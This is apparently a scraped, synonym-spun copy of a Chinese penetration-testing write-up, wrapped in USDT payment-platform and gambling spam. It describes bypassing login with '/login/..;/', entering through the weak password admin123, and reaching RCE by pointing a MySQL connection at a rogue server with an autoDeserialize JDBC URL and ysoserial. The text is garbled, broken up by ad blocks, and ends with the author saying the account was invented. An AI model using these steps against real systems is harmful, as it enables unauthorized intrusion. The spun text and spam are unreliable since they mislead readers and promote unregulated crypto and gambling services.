USDT自动充值API接口

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

前些天在乌云看一下通用系统的洞,然后fofa查了一下打开第一个居然是某src。
事情似乎有点意思了,日他。

然则这个系统被他魔悔改加了验证码,前端也加密了,老洞一定没有。

登录框也许长这样,看了一下有shiro然则打不了。

试了下权限绕过发现/login/..;/ 能直接进去

然则看不到任何数据,点系统参数设置这个功效发现404

去看了下同cms的站,发现直接接见index.jsp,也可以进去(然则src谁人站进不去不知道被咋悔改)
发现这个功效跳到/adminLogin.jsp 然后弱口令admin123进去了

那时直接把这个登录的包拿到src的谁人站去试了一下发现他只是把jsp删了实际上功效还在
然后就直接进到了系统参数设置这里

也许长这样,有一个测试毗邻的功效,点了一下抓包,包结构如下

可以控制mysql毗邻地址,于是想到mysql服务端读客户端文件。
将mysql毗邻地址改为恶意mysql服务端地址发包,似乎不行

然后又想到mysql jdbc反序列化,以前没搞过,在github找到一个项目。
https://github.com/fnmsd/MySQL_Fake_Server
然后这边还需要一个ysoserial.jar我这边使用的 https://github.com/zema1/ysoserial
可以直接打回显,看了下上面谁人项目的README感受有点贫苦,于是直接把

这部门写死,返回jdbc毗邻字符串地方写

,

usdt支付接口

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

,
url=jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&useUnicode=true&characterEncoding=utf-8&username=yso_urldns_http//www.baidu.com/&password=123456

服务器这边开启恶意mysql服务端,发包。


乐成RCE
好吧上面都是我瞎写的,实际上谁人src站点由于我之前测试的时刻快下班了就遗忘搞了,后面想起往复搞效果已经关站了。

USDT官网接口声明:该文看法仅代表作者自己,与本平台无关。转载请注明:usdt充值(www.caibao.it):从权限绕过到mysql jdbc反序列化
发布评论

分享到:

用usdt充值(www.caibao.it):河南一西席被冒名顶替岗位22年 官方:双方曾私下达成协议
3 条回复
  1. 泰达币交易所官网
    泰达币交易所官网
    (2021-06-15 00:01:14) 1#

    USDT跑分平台U交所(www.usdt8.vip)是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U交所开放usdt otc API接口、支付回调等接口。我真觉得可以更好

  2. 新2网址大全
    新2网址大全
    (2021-07-30 00:02:33) 2#

    足球免费推介致敬作者

  3. 新二皇冠最新手机登录
    新二皇冠最新手机登录
    (2021-08-08 00:00:31) 3#

    据美国CNBC网站报道,知情人士透露,荷兰皇家壳牌公司正思量出售其在美国最大油田的持股,公司希望专注于其利润最高的石油与自然气资产,同时增添低碳投资。此次出售的可能是壳牌在美国得克萨斯州二叠纪盆地的部门或所有营业,价值高达100亿美元,约合人民币640亿元。 大家还喜欢哪些

发表评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。